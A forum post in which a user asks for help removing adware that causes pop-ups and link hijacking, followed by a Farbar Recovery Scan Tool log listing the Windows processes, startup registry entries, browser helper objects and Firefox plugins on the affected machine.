Help! "Ad by name" or "Miss Sunshine" creating pop ups, and hyperlinks


41 replies to this topic

#1 ah_hin

Posted 07 April 2015 - 12:47 AM

I was taking a quiz on canvas.instructure.com, and the browser suddenly closed on its own. When I reopened it, many words on the page had turned into clickable hyperlinks. Also, whenever I click an empty area on the website, windows pop up, and my links are redirected to ads, other websites, etc...
Please help me remove this problem/malware!

Thanks!


Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 11-03-2015
Ran by User (administrator) on GIGABYTE on 06-04-2015 22:18:56
Running from C:\Users\User\Desktop\Malware software
Loaded Profiles: User & (Available profiles: User)
Platform: Windows 8.1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Juniper Networks, Inc.) C:\Program Files (x86)\Common Files\Juniper Networks\JUNS\dsAccessService.exe
(Microsoft Corporation) C:\Windows\System32\InputMethod\CHT\ChtIME.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files\GIGABYTE\SmartManagerV3\ElevateService.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(SEIKO EPSON CORPORATION) C:\Program Files\EPSON\EpsonCustomerParticipation\EPCP.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.26.9\GoogleCrashHandler.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.26.9\GoogleCrashHandler64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
() C:\Windows\System32\PnkBstrA.exe
(Mentor Graphics Corporation) C:\Program Files\SolidWorks Corp\SolidWorks Flow Simulation\binCFW\remotesolverdispatcherservice.exe
(Mentor Graphics Corporation) C:\Program Files\SolidWorks Corp\SolidWorks Flow Simulation\binCFW\dispatcher.exe
(GIGABYTE) C:\Program Files\GIGABYTE\Smart Update\Update_Service.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(GIGABYTE) C:\Program Files\GIGABYTE\Smart Update\GMSG.exe
(Dolby Laboratories Inc.) C:\Program Files (x86)\Dolby Home Theater v4\pcee4.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(IvoSoft) C:\Program Files\Classic Shell\ClassicStartMenu.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Codessentials) C:\Program Files (x86)\Codessentials\Yadis\Yadis.exe
(Bluebeam Software, Inc.) C:\Program Files\Common Files\Bluebeam Software\Bluebeam Revu\Brewery\V45\Printer Support\BBPrint.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_IATIJAE.EXE
(GIGABYTE TECHNOLOGY CO., LTD.) C:\Program Files\GIGABYTE\SmartManagerV3\OSD\GBOSDV2.exe
(Dropbox, Inc.) C:\Users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(GIGABYTE TECHNOLOGY CO., LTD.) C:\Program Files\GIGABYTE\SmartManagerV3\GBSMV2.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
(Razer Inc.) C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXRCV.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
() C:\Program Files (x86)\Innovative Solutions\Advanced Uninstaller PRO\checker.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [286704 2013-03-22] (Intel Corporation)
HKLM\...\Run: [ProfilerU] => C:\Program Files\SmartTechnology\Software\ProfilerU.exe [454144 2013-04-16] (Saitek)
HKLM\...\Run: [SaiMfd] => C:\Program Files\SmartTechnology\Software\SaiMfd.exe [158208 2013-04-16] (Saitek)
HKLM\...\Run: [Nvtmru] => "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe"
HKLM\...\Run: [ShadowPlay] => C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2673296 2015-03-27] (NVIDIA Corporation)
HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll",TrayApp
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [8292120 2013-11-14] (Logitech Inc.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13662936 2013-10-24] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1368792 2013-11-13] (Realtek Semiconductor)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-19] (Adobe Systems Incorporated)
HKLM\...\Run: [Classic Start Menu] => C:\Program Files\Classic Shell\ClassicStartMenu.exe [161984 2014-04-05] (IvoSoft)
HKLM\...\Run: [Yadis] => c:\program files (x86)\codessentials\yadis\yadis.exe [1777664 2014-04-15] (Codessentials)
HKLM\...\Run: [BbInstallUser] => C:\Program Files\Bluebeam Software\Bluebeam Revu\Pushbutton PDF\Bluebeam Admin User.exe [48696 2014-02-21] (Bluebeam Software, Inc.)
HKLM\...\Run: [BbPrintMonitor] => C:\Program Files\Common Files\Bluebeam Software\Bluebeam Revu\Brewery\V45\Printer Support\BBPrint.exe [211000 2014-02-21] (Bluebeam Software, Inc.)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3100440 2014-05-19] (Logitech, Inc.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [93296 2012-07-13] (CyberLink Corp.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [926896 2012-09-23] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Acrotray.exe [3477640 2012-09-23] (Adobe Systems Inc.)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [143360 2012-09-06] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [585048 2014-04-17] (Razer Inc.)
HKLM-x32\...\Run: [JunosPulse] => C:\Program Files (x86)\Common Files\Juniper Networks\JamUI\Pulse.exe [2521944 2014-08-07] (Juniper Networks, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1058400 2012-01-26] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [FUFAXRCV] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXRCV.exe [642664 2013-12-24] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [FUFAXSTM] => C:\Program Files (x86)\Epson Software\FAX Utility\FUFAXSTM.exe [863848 2013-12-24] (SEIKO EPSON CORPORATION)
HKLM-x32\...\RunOnce: [SmartUpdate] => C:\Program Files\GIGABYTE\Smart Update\urgent.exe [362496 2015-02-11] (GIGABYTE)
HKLM\...\Winlogon: [Shell] explorer.exe,explorer.exe
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKU\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_IATIJAE.EXE [283232 2012-02-29] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_IATIJAE.EXE [283232 2012-02-29] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\scrnsave.scr [11776 2013-08-22] (Microsoft Corporation)
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_IATIJAE.EXE [283232 2012-02-29] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\scrnsave.scr [11776 2013-08-22] (Microsoft Corporation)
HKU\S-1-5-18\...\Run: [EPLTarget\P0000000000000000] => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_IATIJAE.EXE [283232 2012-02-29] (SEIKO EPSON CORPORATION)
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [178512 2015-03-13] (NVIDIA Corporation)
AppInit_DLLs: , C:\WINDOWS\system32\nvinitx.dll => C:\WINDOWS\system32\nvinitx.dll [178512 2015-03-13] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\WINDOWS\SysWOW64\nvinit.dll => C:\WINDOWS\SysWOW64\nvinit.dll [164568 2015-03-13] (NVIDIA Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\GBOSDV3.lnk
ShortcutTarget: GBOSDV3.lnk -> C:\Program Files\GIGABYTE\SmartManagerV3\OSD\GBOSDV2.exe (GIGABYTE TECHNOLOGY CO., LTD.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SolidWorks 2014 Fast Start.lnk
ShortcutTarget: SolidWorks 2014 Fast Start.lnk -> C:\Windows\Installer\{4FFA60C4-9A8B-4C9E-8265-2241B266304C}\NewShortcut2_87EDF6C81D0A4B7B84F42FE0C6A9D608.exe (Flexera Software LLC)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SolidWorks Background Downloader.lnk
ShortcutTarget: SolidWorks Background Downloader.lnk -> C:\Program Files (x86)\Common Files\SolidWorks Installation Manager\BackgroundDownloading\sldBgDwld.exe (Dassault Systèmes SolidWorks Corp.)
Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => No File
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ShareOverlay] -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => No File
ShellIconOverlayIdentifiers-x32: [ShareOverlay] -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\Software\Microsoft\Internet Explorer\Main,Start Page = http://localoem.msn.com/?pc=SBJB
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://localoem.msn.com/?pc=SBJB
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page = http://localoem.msn.com/?pc=SBJB
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://localoem.msn.com/?pc=SBJB
SearchScopes: HKU\.DEFAULT -> DefaultScope {CC7C65C2-1281-428A-A48E-BCC15EC72E0E} URL =
SearchScopes: HKU\.DEFAULT -> {CC7C65C2-1281-428A-A48E-BCC15EC72E0E} URL =
SearchScopes: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002 -> {CC7C65C2-1281-428A-A48E-BCC15EC72E0E} URL =
SearchScopes: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {CC7C65C2-1281-428A-A48E-BCC15EC72E0E} URL =
BHO: Super Radio -> {11111111-1111-1111-1111-110611791177} -> No File
BHO: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer64.dll [2014-04-05] (IvoSoft)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2014-05-19] (Logitech, Inc.)
BHO: ClassicIEBHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIEDLL_64.dll [2014-04-05] (IvoSoft)
BHO: DVDVideoSoft IE Extension -> {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} -> C:\Program Files (x86)\Common Files\DVDVideoSoft\bin\IEDownloadMenuAndBtns64.dll [2014-05-27] (DVDVideoSoft Ltd.)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer32.dll [2014-04-05] (IvoSoft)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2014-09-26] (Oracle Corporation)
BHO-x32: Adobe Acrobat Create PDF Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2014-05-19] (Logitech, Inc.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2014-09-26] (Oracle Corporation)
BHO-x32: ClassicIEBHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIEDLL_32.dll [2014-04-05] (IvoSoft)
BHO-x32: DVDVideoSoft IE Extension -> {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} -> C:\Program Files (x86)\Common Files\DVDVideoSoft\bin\IEDownloadMenuAndBtns.dll [2014-08-07] (DVDVideoSoft Ltd.)
BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2012-09-23] (Adobe Systems Incorporated)
Toolbar: HKLM - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer64.dll [2014-04-05] (IvoSoft)
Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2012-09-23] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll [2014-04-05] (IvoSoft)
DPF: HKLM {AA570693-00E2-4907-B6F1-60A1199B030C} https://juniper.net/dana-cached/sc/JuniperSetupClient64.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://juniper.net/dana-cached/sc/JuniperSetupClient.cab
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76

FireFox:
========
FF ProfilePath: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default
FF SelectedSearchEngine: Webster
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_16_0_0_305.dll [2015-02-06] ()
FF Plugin: @esn/npbattlelog,version=2.5.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.1\npbattlelogx64.dll [2014-09-01] (EA Digital Illusions CE AB)
FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [2014-12-03] (EA Digital Illusions CE AB)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.31211.0\npctrl.dll [2014-12-11] ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2012-09-19] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-06] ()
FF Plugin-x32: @baidu.com/npxbdsetup -> C:\WINDOWS\Downloaded Program Files\12151625\npxbdsetup.dll [2012-12-26] ()
FF Plugin-x32: @esn/npbattlelog,version=2.4.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll No File
FF Plugin-x32: @esn/npbattlelog,version=2.5.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.1\npbattlelog.dll No File
FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [2014-12-03] (EA Digital Illusions CE AB)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=3.5.29 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-05-31] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-05-31] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-09-26] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-09-26] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.31211.0\npctrl.dll [2014-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-03-13] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-03-13] (NVIDIA Corporation)
FF Plugin-x32: @qvod.com/QvodInsert -> D:\Program Files (x86)\xuanfeng\QvodPlayer\npQvodInsert.dll No File
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll No File
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll No File
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-22] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-22] (VideoLAN)
